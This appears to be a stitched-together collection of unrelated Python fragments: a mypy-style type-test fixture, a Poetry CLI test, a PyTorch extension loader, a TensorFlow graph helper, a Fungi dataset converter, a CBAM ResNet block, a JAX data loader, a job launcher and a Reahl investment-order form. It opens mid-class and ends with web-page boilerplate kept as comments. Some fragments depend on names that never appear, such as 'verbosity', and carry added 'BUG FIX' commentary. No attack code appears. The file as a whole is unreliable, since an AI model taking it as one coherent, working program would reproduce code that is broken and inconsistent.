        self.gd = Instance(self.gi, [self.d])
        self.go = Instance(self.gi, [self.o])
        self.gt = Instance(self.gi, [self.t])
        self.gtf = Instance(self.gi, [self.tf])
        self.gtf2 = Instance(self.gi, [self.tf2])
        self.gs = Instance(self.gi, [self.s])
        self.gdyn = Instance(self.gi, [self.anyt])
        self.gn = Instance(self.gi, [NoneType()])
        self.g2a = Instance(self.g2i, [self.a])
        self.gsaa = Instance(self.gsi, [self.a, self.a])
        self.gsab = Instance(self.gsi, [self.a, self.b])
        self.gsba = Instance(self.gsi, [self.b, self.a])
        self.gs2a = Instance(self.gs2i, [self.a])
        self.gs2b = Instance(self.gs2i, [self.b])
        self.gs2d = Instance(self.gs2i, [self.d])
        self.hab = Instance(self.hi, [self.a, self.b])
        self.haa = Instance(self.hi, [self.a, self.a])
        self.hbb = Instance(self.hi, [self.b, self.b])
        self.hts = Instance(self.hi, [self.t, self.s])
        self.had = Instance(self.hi, [self.a, self.d])
        self.hao = Instance(self.hi, [self.a, self.o])
        self.lsta = Instance(self.std_listi, [self.a])
        self.lstb = Instance(self.std_listi, [self.b])

        # --- literal types and their corresponding Instances ---
        self.lit1 = LiteralType(1, self.a)
        self.lit2 = LiteralType(2, self.a)
        self.lit3 = LiteralType('foo', self.d)
        self.lit4 = LiteralType(4, self.a)
        self.lit1_inst = Instance(self.ai, [], last_known_value=self.lit1)
        self.lit2_inst = Instance(self.ai, [], last_known_value=self.lit2)
        self.lit3_inst = Instance(self.di, [], last_known_value=self.lit3)
        self.lit4_inst = Instance(self.ai, [], last_known_value=self.lit4)
        self.lit_str1 = LiteralType('x', self.str_type)
        self.lit_str2 = LiteralType('y', self.str_type)
        self.lit_str3 = LiteralType('z', self.str_type)
        self.lit_str1_inst = Instance(self.str_type_info, [], last_known_value=self.lit_str1)
        self.lit_str2_inst = Instance(self.str_type_info, [], last_known_value=self.lit_str2)
        self.lit_str3_inst = Instance(self.str_type_info, [], last_known_value=self.lit_str3)
        self.lit_false = LiteralType(False, self.bool_type)
        self.lit_true = LiteralType(True, self.bool_type)

        # --- type[...] objects ---
        self.type_a = TypeType.make_normalized(self.a)
        self.type_b = TypeType.make_normalized(self.b)
        self.type_c = TypeType.make_normalized(self.c)
        self.type_d = TypeType.make_normalized(self.d)
        self.type_t = TypeType.make_normalized(self.t)
        self.type_any = TypeType.make_normalized(self.anyt)

        # bool and A get a __bool__ method so truthiness narrowing works.
        self._add_bool_dunder(self.bool_type_info)
        self._add_bool_dunder(self.ai)

        # --- type variables with non-object upper bounds ---
        self.ub = make_type_var('UB', 5, [], self.b, variance)
        self.uc = make_type_var('UC', 6, [], self.c, variance)

        # Helper: a TypeVarTuple bounded by tuple[object, ...].
        def make_type_var_tuple(name: str, id: int, upper_bound: Type) -> TypeVarTupleType:
            return TypeVarTupleType(name, name, id, upper_bound, self.std_tuple, AnyType(TypeOfAny.from_omitted_generics))

        # --- TypeVarTuples and variadic generic classes GV[*Ts], GV2[T, *Ts, S] ---
        obj_tuple = self.std_tuple.copy_modified(args=[self.o])
        self.ts = make_type_var_tuple('Ts', 1, obj_tuple)
        self.ss = make_type_var_tuple('Ss', 2, obj_tuple)
        self.us = make_type_var_tuple('Us', 3, obj_tuple)
        self.gvi = self.make_type_info('GV', mro=[self.oi], typevars=['Ts'], typevar_tuple_index=0)
        self.gv2i = self.make_type_info('GV2', mro=[self.oi], typevars=['T', 'Ts', 'S'], typevar_tuple_index=1)
    def _add_bool_dunder(self, type_info: TypeInfo) -> None:
        """Attach a ``__bool__() -> bool`` method to ``type_info``."""
        signature = CallableType([], [], [], Instance(self.bool_type_info, []), self.function)
        bool_func = FuncDef('__bool__', [], Block([]))
        bool_func.type = set_callable_name(signature, bool_func)
        type_info.names[bool_func.name] = SymbolTableNode(MDEF, bool_func)
    def callable(self, *a: Type) -> CallableType:
        """callable(a1, ..., an, r) -> (a1, ..., an) -> r (all positional)."""
        return CallableType(list(a[:(- 1)]), ([ARG_POS] * (len(a) - 1)), ([None] * (len(a) - 1)), a[(- 1)], self.function)
    def callable_type(self, *a: Type) -> CallableType:
        """Like :meth:`callable`, but with fallback ``builtins.type``."""
        return CallableType(list(a[:(- 1)]), ([ARG_POS] * (len(a) - 1)), ([None] * (len(a) - 1)), a[(- 1)], self.type_type)
    def callable_default(self, min_args: int, *a: Type) -> CallableType:
        """Callable where only the first ``min_args`` arguments are required."""
        n = (len(a) - 1)
        return CallableType(list(a[:(- 1)]), (([ARG_POS] * min_args) + ([ARG_OPT] * (n - min_args))), ([None] * n), a[(- 1)], self.function)
    def callable_var_arg(self, min_args: int, *a: Type) -> CallableType:
        """Callable whose last declared argument is a ``*args`` star argument."""
        n = (len(a) - 1)
        return CallableType(list(a[:(- 1)]), ((([ARG_POS] * min_args) + ([ARG_OPT] * ((n - 1) - min_args))) + [ARG_STAR]), ([None] * n), a[(- 1)], self.function)
    def make_type_info(self, name: str, module_name: (str | None)=None, is_abstract: bool=False, mro: (list[TypeInfo] | None)=None, bases: (list[Instance] | None)=None, typevars: (list[str] | None)=None, typevar_tuple_index: (int | None)=None, variances: (list[int] | None)=None) -> TypeInfo:
        """Make a TypeInfo suitable for use in unit tests.

        ``typevars`` names become TypeVarTypes (or a TypeVarTupleType at
        ``typevar_tuple_index``); the MRO and bases default to object.
        """
        class_def = ClassDef(name, Block([]), None, [])
        class_def.fullname = name
        if (module_name is None):
            if ('.' in name):
                module_name = name.rsplit('.', 1)[0]
            else:
                module_name = '__main__'
        if typevars:
            v: list[TypeVarLikeType] = []
            for (id, n) in enumerate(typevars, 1):
                if ((typevar_tuple_index is not None) and ((id - 1) == typevar_tuple_index)):
                    v.append(TypeVarTupleType(n, n, id, self.std_tuple.copy_modified(args=[self.o]), self.std_tuple.copy_modified(args=[self.o]), AnyType(TypeOfAny.from_omitted_generics)))
                else:
                    if variances:
                        variance = variances[(id - 1)]
                    else:
                        variance = COVARIANT
                    v.append(TypeVarType(n, n, id, [], self.o, AnyType(TypeOfAny.from_omitted_generics), variance=variance))
            class_def.type_vars = v
        info = TypeInfo(SymbolTable(), class_def, module_name)
        if (mro is None):
            mro = []
            # Everything except object itself implicitly derives from object.
            if (name != 'builtins.object'):
                mro.append(self.oi)
        info.mro = ([info] + mro)
        if (bases is None):
            if mro:
                bases = [Instance(mro[0], [])]
            else:
                bases = []
        info.bases = bases
        return info
    def def_alias_1(self, base: Instance) -> tuple[(TypeAliasType, Type)]:
        """Recursive alias: A = Tuple[Union[base, A], ...]."""
        A = TypeAliasType(None, [])
        target = Instance(self.std_tuplei, [UnionType([base, A])])
        AN = TypeAlias(target, '__main__.A', (- 1), (- 1))
        A.alias = AN
        return (A, target)
    def def_alias_2(self, base: Instance) -> tuple[(TypeAliasType, Type)]:
        """Recursive alias: A = Union[base, Tuple[A, ...]]."""
        A = TypeAliasType(None, [])
        target = UnionType([base, Instance(self.std_tuplei, [A])])
        AN = TypeAlias(target, '__main__.A', (- 1), (- 1))
        A.alias = AN
        return (A, target)
    def non_rec_alias(self, target: Type, alias_tvars: (list[TypeVarLikeType] | None)=None, args: (list[Type] | None)=None) -> TypeAliasType:
        """Non-recursive alias of ``target``, optionally generic over ``alias_tvars``."""
        AN = TypeAlias(target, '__main__.A', (- 1), (- 1), alias_tvars=alias_tvars)
        if (args is None):
            args = []
        return TypeAliasType(AN, args)
def test_none_activated(tester: CommandTester, venvs_in_cache_dirs: list[str], mocker: MockerFixture, env: MockEnv) -> None:
    """With no venv activated, the command lists every cached venv plainly."""
    # Force EnvManager.get() to report the mock (non-activated) environment.
    mocker.patch('poetry.utils.env.EnvManager.get', return_value=env)
    tester.execute()
    output = tester.io.fetch_output()
    assert output.strip() == '\n'.join(venvs_in_cache_dirs)
def get_plugin(module_name, sources, **build_kwargs):
    """Compile and load a custom PyTorch C++/CUDA extension, with caching.

    Looks the plugin up in the in-process cache first; otherwise makes sure a
    host compiler is on PATH, optionally builds into a source-hash-keyed
    directory (so edits trigger rebuilds even when TORCH_EXTENSIONS_DIR is
    set), compiles via ``torch.utils.cpp_extension.load``, imports the
    resulting module and caches it.

    Args:
        module_name: importable name of the compiled extension module.
        sources: list of C++/CUDA source file paths.
        **build_kwargs: forwarded to ``torch.utils.cpp_extension.load``.

    Returns:
        The imported extension module.
    """
    assert (verbosity in ['none', 'brief', 'full'])
    # Already built and imported in this process?
    if (module_name in _cached_plugins):
        return _cached_plugins[module_name]
    if (verbosity == 'full'):
        print(f'Setting up PyTorch plugin "{module_name}"...')
    elif (verbosity == 'brief'):
        print(f'Setting up PyTorch plugin "{module_name}"... ', end='', flush=True)
    try:
        # Make sure a host compiler is reachable on PATH.
        if ((os.name == 'nt') and (os.system('where cl.exe >nul 2>nul') != 0)):
            compiler_bindir = _find_compiler_bindir()
            if (compiler_bindir is None):
                raise RuntimeError(f'Could not find MSVC/GCC/CLANG installation on this computer. Check _find_compiler_bindir() in "{__file__}".')
            # os.pathsep is ';' on Windows.
            os.environ['PATH'] += (os.pathsep + compiler_bindir)
        elif (os.name == 'posix'):
            compiler_bindir = _find_compiler_bindir_posix()
            if (compiler_bindir is None):
                raise RuntimeError(f'Could not find NVCC installation on this computer. Check _find_compiler_bindir_posix() in "{__file__}".')
            # BUG FIX: the original appended with ';', which is the Windows PATH
            # separator; POSIX uses ':' (os.pathsep), so the compiler dir was
            # folded into one bogus PATH entry and never found.
            os.environ['PATH'] += (os.pathsep + compiler_bindir)
        verbose_build = (verbosity == 'full')
        # If all sources live in one directory and the user pinned
        # TORCH_EXTENSIONS_DIR, key the build directory by an MD5 digest of the
        # sources so that edits invalidate torch's otherwise-sticky cache.
        source_dirs_set = set((os.path.dirname(source) for source in sources))
        if ((len(source_dirs_set) == 1) and ('TORCH_EXTENSIONS_DIR' in os.environ)):
            all_source_files = sorted(list((x for x in Path(list(source_dirs_set)[0]).iterdir() if x.is_file())))
            hash_md5 = hashlib.md5()
            for src in all_source_files:
                with open(src, 'rb') as f:
                    hash_md5.update(f.read())
            build_dir = torch.utils.cpp_extension._get_build_directory(module_name, verbose=verbose_build)
            digest_build_dir = os.path.join(build_dir, hash_md5.hexdigest())
            if (not os.path.isdir(digest_build_dir)):
                os.makedirs(digest_build_dir, exist_ok=True)
                # File-lock the copy so concurrent processes don't race.
                baton = FileBaton(os.path.join(digest_build_dir, 'lock'))
                if baton.try_acquire():
                    try:
                        for src in all_source_files:
                            shutil.copyfile(src, os.path.join(digest_build_dir, os.path.basename(src)))
                    finally:
                        baton.release()
                else:
                    # Another process is copying; wait for it to finish.
                    baton.wait()
            digest_sources = [os.path.join(digest_build_dir, os.path.basename(x)) for x in sources]
            torch.utils.cpp_extension.load(name=module_name, build_directory=build_dir, verbose=verbose_build, sources=digest_sources, **build_kwargs)
        else:
            torch.utils.cpp_extension.load(name=module_name, verbose=verbose_build, sources=sources, **build_kwargs)
        module = importlib.import_module(module_name)
    except:
        # Bare except is deliberate: report failure in brief mode, then re-raise.
        if (verbosity == 'brief'):
            print('Failed!')
        raise
    if (verbosity == 'full'):
        print(f'Done setting up PyTorch plugin "{module_name}".')
    elif (verbosity == 'brief'):
        print('Done.')
    _cached_plugins[module_name] = module
    return module
def get_walks_union_ops(forward_seed_ops, backward_seed_ops, forward_inclusive=True, backward_inclusive=True, within_ops=None, within_ops_fn=None, control_inputs=False, control_outputs=None, control_ios=None):
    """Return the union of a forward walk from ``forward_seed_ops`` and a
    backward walk from ``backward_seed_ops``, restricted to ``within_ops``.
    """
    # Normalize the three control-dependency arguments into a consistent pair.
    control_inputs, control_outputs = check_cios(control_inputs, control_outputs, control_ios)
    ops_forward = get_forward_walk_ops(
        forward_seed_ops,
        inclusive=forward_inclusive,
        within_ops=within_ops,
        within_ops_fn=within_ops_fn,
        control_outputs=control_outputs,
    )
    ops_backward = get_backward_walk_ops(
        backward_seed_ops,
        inclusive=backward_inclusive,
        within_ops=within_ops,
        within_ops_fn=within_ops_fn,
        control_inputs=control_inputs,
    )
    # Deduplicated union, preserving first-seen order.
    return util.concatenate_unique(ops_forward, ops_backward)
class FungiConverter(DatasetConverter):
    """Convert the FGVCx Fungi dataset into per-class TFRecord files.

    Classes are randomly partitioned into train/valid/test splits; the train
    and validation annotation JSONs are merged before writing records.
    """
    # Random split sizes over the 1394 categories.
    NUM_TRAIN_CLASSES = 994
    NUM_VALID_CLASSES = 200
    NUM_TEST_CLASSES = 200
    def create_splits(self):
        """Randomly assign class labels to train/valid/test splits.

        Returns:
            dict mapping 'train'/'valid'/'test' to lists of
            '<4-digit id>.<name>' labels.
        """
        with tf.io.gfile.GFile(os.path.join(self.data_root, 'train.json')) as f:
            original_train = json.load(f)
        with tf.io.gfile.GFile(os.path.join(self.data_root, 'val.json')) as f:
            original_val = json.load(f)
        # Both files must describe the same category set.
        assert (original_train['categories'] == original_val['categories'])
        categories = sorted(original_train['categories'], key=operator.itemgetter('id'))
        # Category ids are expected to be a dense 0..N-1 range.
        assert ([category['id'] for category in categories] == list(range(len(categories))))
        # Label format '<0-padded id>.<name>' keeps the numeric id recoverable.
        labels = ['{:04d}.{}'.format(category['id'], category['name']) for category in categories]
        (train_inds, valid_inds, test_inds) = gen_rand_split_inds(self.NUM_TRAIN_CLASSES, self.NUM_VALID_CLASSES, self.NUM_TEST_CLASSES)
        splits = {'train': [labels[i] for i in train_inds], 'valid': [labels[i] for i in valid_inds], 'test': [labels[i] for i in test_inds]}
        return splits
    def create_dataset_specification_and_records(self):
        """Write one TFRecord per class and fill in the dataset specification."""
        splits = self.get_splits()
        train_classes = splits['train']
        valid_classes = splits['valid']
        test_classes = splits['test']
        self.classes_per_split[learning_spec.Split.TRAIN] = len(train_classes)
        self.classes_per_split[learning_spec.Split.VALID] = len(valid_classes)
        self.classes_per_split[learning_spec.Split.TEST] = len(test_classes)
        with tf.io.gfile.GFile(os.path.join(self.data_root, 'train.json')) as f:
            original_train = json.load(f)
        with tf.io.gfile.GFile(os.path.join(self.data_root, 'val.json')) as f:
            original_val = json.load(f)
        # Merge the official train and val image lists; ids must be unique.
        image_list = (original_train['images'] + original_val['images'])
        image_id_dict = {}
        for image in image_list:
            assert (image['id'] not in image_id_dict)
            image_id_dict[image['id']] = image
        # Attach each image's category id from the annotation records
        # (exactly one annotation per image).
        annotations = (original_train['annotations'] + original_val['annotations'])
        for annotation in annotations:
            assert ('class' not in image_id_dict[annotation['image_id']])
            image_id_dict[annotation['image_id']]['class'] = annotation['category_id']
        # Group absolute file paths by category id.
        class_filepaths = collections.defaultdict(list)
        for image in image_list:
            class_filepaths[image['class']].append(os.path.join(self.data_root, image['file_name']))
        # Global class ids are assigned in train, valid, test order.
        all_classes = list(itertools.chain(train_classes, valid_classes, test_classes))
        for (class_id, class_label) in enumerate(all_classes):
            logging.info('Creating record for class ID %d (%s)...', class_id, class_label)
            # Recover the numeric category id from the label's 4-digit prefix.
            category_id = int(class_label[:4])
            if (category_id not in class_filepaths):
                raise ValueError(('class_filepaths does not contain paths to any image for category %d. Existing categories are: %s.' % (category_id, class_filepaths.keys())))
            class_paths = class_filepaths[category_id]
            class_records_path = os.path.join(self.records_path, self.dataset_spec.file_pattern.format(class_id))
            self.class_names[class_id] = class_label
            self.images_per_class[class_id] = len(class_paths)
            write_tfrecord_from_image_files(class_paths, class_id, class_records_path)
class BasicBlock(nn.Module):
    """ResNet basic residual block augmented with CBAM-style channel and
    spatial attention applied to the residual branch before the skip add.
    """

    expansion = 1

    def __init__(self, inplanes, planes, stride=1, downsample=None):
        super().__init__()
        # Residual branch: conv-bn-relu-conv-bn, then attention gates.
        self.conv1 = conv3x3(inplanes, planes, stride)
        self.bn1 = nn.BatchNorm2d(planes)
        self.relu = nn.ReLU(inplace=True)
        self.conv2 = conv3x3(planes, planes)
        self.bn2 = nn.BatchNorm2d(planes)
        self.ca = ChannelAttention(planes)
        self.sa = SpatialAttention()
        # Optional projection for the identity path when shapes differ.
        self.downsample = downsample
        self.stride = stride
        self.inplanes = inplanes

    def forward(self, x):
        identity = x
        y = self.relu(self.bn1(self.conv1(x)))
        y = self.bn2(self.conv2(y))
        # Gate the residual branch by channel then spatial attention maps.
        y = self.ca(y) * y
        y = self.sa(y) * y
        if self.downsample is not None:
            identity = self.downsample(x)
        y += identity
        return self.relu(y)
def args_dict(args):
    """Bundle flat CLI options into grouped dict attributes on ``args``.

    Adds ``dataset``, ``setting`` and ``manner`` dicts plus ``ex_name`` (the
    current working directory's last path component), then returns the same
    ``args`` object.
    """
    args.dataset = dict(train=args.train, val=args.val, test=args.test, matching=args.matching)
    args.setting = dict(sample_rate=args.sample_rate, segment=args.segment, pad=args.pad, stride=args.set_stride)
    args.manner = dict(
        in_channels=args.in_channels,
        out_channels=args.out_channels,
        hidden=args.hidden,
        depth=args.depth,
        kernel_size=args.kernel_size,
        stride=args.stride,
        growth=args.growth,
        head=args.head,
        segment_len=args.segment_len,
    )
    # Experiment name = last component of the cwd (backslashes normalized).
    cwd = os.getcwd().replace('\\', '/')
    args.ex_name = cwd.split('/')[(- 1)]
    return args
def get_params(opt, size):
    """Sample random crop position and flip flag for one image.

    ``size`` is the original (width, height); the preprocess mode determines
    the resized dimensions before a ``crop_size`` crop is positioned.

    Returns:
        dict with 'crop_pos' (x, y) and 'flip' (bool).
    """
    w, h = size
    new_w, new_h = w, h
    mode = opt.preprocess_mode
    if mode == 'resize_and_crop':
        # Square resize to load_size.
        new_h = new_w = opt.load_size
    elif mode == 'scale_width_and_crop':
        # Fix width to load_size, scale height proportionally.
        new_w = opt.load_size
        new_h = (opt.load_size * h) // w
    elif mode == 'scale_shortside_and_crop':
        # Fix the short side to load_size, scale the long side proportionally.
        ss, ls = min(w, h), max(w, h)
        width_is_shorter = (w == ss)
        ls = int((opt.load_size * ls) / ss)
        if width_is_shorter:
            new_w, new_h = ss, ls
        else:
            new_w, new_h = ls, ss
    # Random top-left corner of the crop; clamped to 0 when the resized image
    # is smaller than crop_size.
    x = random.randint(0, np.maximum(0, new_w - opt.crop_size))
    y = random.randint(0, np.maximum(0, new_h - opt.crop_size))
    flip = random.random() > 0.5
    return {'crop_pos': (x, y), 'flip': flip}
def data_loader(rng: jax.random.PRNGKey, dataset: Dataset, batch_size: int, shuffle: bool=False, drop_last=True):
    """Yield batches of ``dataset`` as dicts of numpy arrays.

    When ``shuffle`` is True the order is a jax-random permutation seeded by
    ``rng``; otherwise sequential.  With ``drop_last`` the trailing partial
    batch is discarded, otherwise it is yielded as a smaller final batch.
    """
    n = len(dataset)
    if shuffle:
        order = np.asarray(jax.random.permutation(rng, n))
    else:
        order = np.arange(n)
    if drop_last:
        # Truncate to a multiple of batch_size; one row per step.
        steps_per_epoch = n // batch_size
        order = order[:steps_per_epoch * batch_size]
        batches = order.reshape((steps_per_epoch, batch_size))
    else:
        # Final chunk may be smaller than batch_size.
        steps_per_epoch = math.ceil(n / batch_size)
        batches = np.array_split(order, steps_per_epoch)
    for idx in batches:
        raw = dataset[idx]
        yield {key: np.array(value) for (key, value) in raw.items()}
def test_cursor():
    """Cursor helpers emit the expected ANSI CSI escape sequences."""
    count = 1
    # Directional moves: CSI <count> <letter>.
    for move, letter in ((ansi.Cursor.UP, 'A'), (ansi.Cursor.DOWN, 'B'), (ansi.Cursor.FORWARD, 'C'), (ansi.Cursor.BACK, 'D')):
        assert move(count) == f'{ansi.CSI}{count}{letter}'
    # Absolute positioning: CSI <row> ; <col> H (note the y;x order).
    x = 4
    y = 5
    assert ansi.Cursor.SET_POS(x, y) == f'{ansi.CSI}{y};{x}H'
def run_job_locally(job_command, log_path, args, no_launch=False, log_file_prefix=''):
    """Write a launch script for *job_command* under *log_path* and run it with bash.

    The script optionally activates a conda environment, logs system info
    before and after the command, and pins the CPU thread count.  stderr is
    redirected to args.stderr_file while stdout is appended (via tee) to
    args.stdout_file, both prefixed with *log_file_prefix*.
    """
    script_path = os.path.join(log_path, log_file_prefix + 'launch.sh')
    with open(script_path, 'w') as script:
        if args.conda_env:
            print(f'source activate {args.conda_env}', file=script)
        # System info is echoed both before and after the job to bracket the run.
        echo_system_info(script)
        set_num_cpu_threads(script, args.num_cpus)
        print(job_command, file=script)
        echo_system_info(script)

    out_path = os.path.join(log_path, log_file_prefix + args.stdout_file)
    err_path = os.path.join(log_path, log_file_prefix + args.stderr_file)
    shell_cmd = f'bash {script_path} 2>{err_path} | tee -a {out_path}'
    run_cmd_with_line_printing(shell_cmd, no_launch=no_launch)
_scoped
class InvestmentOrder(Base):
    """Persisted investment order captured by the responsive-disclosure example form.

    Holds investor identification (new or existing), the total amount to
    invest, and per-fund Allocations expressed either as absolute amounts or
    as percentages of the total.
    """
    __tablename__ = 'rspnsv_disc_investment_order'
    id = Column(Integer, primary_key=True)
    agreed_to_terms = Column(Boolean)
    new_or_existing = Column(UnicodeText)
    existing_account_number = Column(Integer)
    name = Column(UnicodeText)
    surname = Column(UnicodeText)
    amount = Column(Integer)
    amount_or_percentage = Column(UnicodeText)
    # Child rows are owned by the order: delete-orphan removes replaced ones.
    allocations = relationship('reahl.doc.examples.howtos.responsivedisclosure.responsivedisclosure.Allocation', back_populates='investment_order', lazy='immediate', cascade='all, delete-orphan')
    id_document = relationship('reahl.doc.examples.howtos.responsivedisclosure.responsivedisclosure.IDDocument', uselist=False, back_populates='investment_order', cascade='all, delete-orphan')

    # Declarative UI field definitions (Reahl ExposedNames convention).
    fields = ExposedNames()
    fields.agreed_to_terms = (lambda i: BooleanField(label='I agree to the terms and conditions'))
    fields.new_or_existing = (lambda i: ChoiceField([Choice('new', Field(label='New')), Choice('existing', Field(label='Existing'))], label='Are you a new or existing investor?'))
    fields.existing_account_number = (lambda i: IntegerField(label='Existing account number', required=True))
    fields.name = (lambda i: Field(label='Name', required=True))
    fields.surname = (lambda i: Field(label='Surname', required=True))
    fields.amount = (lambda i: IntegerField(label='Total amount', required=True))
    fields.amount_or_percentage = (lambda i: ChoiceField([Choice('amount', Field(label='Amount')), Choice('percentage', Field(label='Percentage'))], label='Allocate using', required=True))

    events = ExposedNames()
    events.submit = (lambda i: Event(label='Submit', action=Action(i.submit)))
    events.allocation_changed = (lambda i: Event(action=Action(i.recalculate)))

    def __init__(self, **kwargs):
        super().__init__(**kwargs)
        self.clear()

    def clear(self):
        """Reset the order to a pristine state: percentage-based allocation over two funds."""
        self.amount_or_percentage = 'percentage'
        self.name = None
        self.surname = None
        self.amount = 0
        self.existing_account_number = None
        self.new_or_existing = None
        self.agreed_to_terms = False
        self.allocations = [Allocation(self, 'Fund A'), Allocation(self, 'Fund B')]
        self.id_document = IDDocument(investment_order=self)

    def is_in_percentage(self):
        """Return True when allocations are expressed as percentages of the total."""
        return (self.amount_or_percentage == 'percentage')

    def recalculate(self):
        """Recompute each allocation's derived values from the current total amount."""
        for allocation in self.allocations:
            allocation.recalculate(self.amount)

    def total_allocation_amount(self):
        """Sum of the absolute amounts across all allocations."""
        return sum([i.amount for i in self.allocations])

    def total_allocation_percentage(self):
        """Sum of the percentages across all allocations."""
        return sum([i.percentage for i in self.allocations])

    def validate_allocations(self):
        """Raise DomainException unless the allocations add up consistently.

        Percentages must total exactly 100; absolute amounts must total the
        order's overall amount.
        """
        # BUG FIX: the original tested/compared the bound methods themselves
        # (e.g. `if self.is_in_percentage:` and
        # `self.total_allocation_percentage != 100`). A bound method is always
        # truthy and never equals an int, so validation unconditionally raised
        # the percentage error. The methods must be *called*.
        if self.is_in_percentage():
            if (self.total_allocation_percentage() != 100):
                raise DomainException(message='Please ensure allocation percentages add up to 100')
        elif (self.total_allocation_amount() != self.amount):
            raise DomainException(message=('Please ensure allocation amounts add up to your total amount (%s)' % self.amount))

    def submit(self):
        """Validate the order, print a summary of it, and reset for the next one."""
        print('Submitting investment')
        self.recalculate()
        self.validate_allocations()
        if (self.new_or_existing == 'new'):
            print(('\tName: %s' % self.name))
            print(('\tSurname: %s' % self.surname))
            print(('\t%s' % str(self.id_document)))
        else:
            print(('\tExisting account number: %s' % self.existing_account_number))
        print(('\tAgreed to terms: %s' % self.agreed_to_terms))
        print(('\tAmount: %s' % self.amount))
        print(('\tAllocations (%s)' % self.amount_or_percentage))
        for allocation in self.allocations:
            # BUG FIX: call is_in_percentage() — the bare bound method was
            # always truthy, so amounts were never shown in amount mode.
            allocation_size = (allocation.percentage if self.is_in_percentage() else allocation.amount)
            print(('\t\tFund %s(%s): %s (%s)' % (allocation.fund, allocation.fund_code, allocation_size, allocation.amount)))
        self.clear()
# NOTE(review): the three lines below are non-code residue from a web page
# (dataset-viewer boilerplate) that was a syntax error as plain source;
# preserved here as comments.
# Subsets and Splits
# No community queries yet
# The top public SQL queries from the community will appear here once available.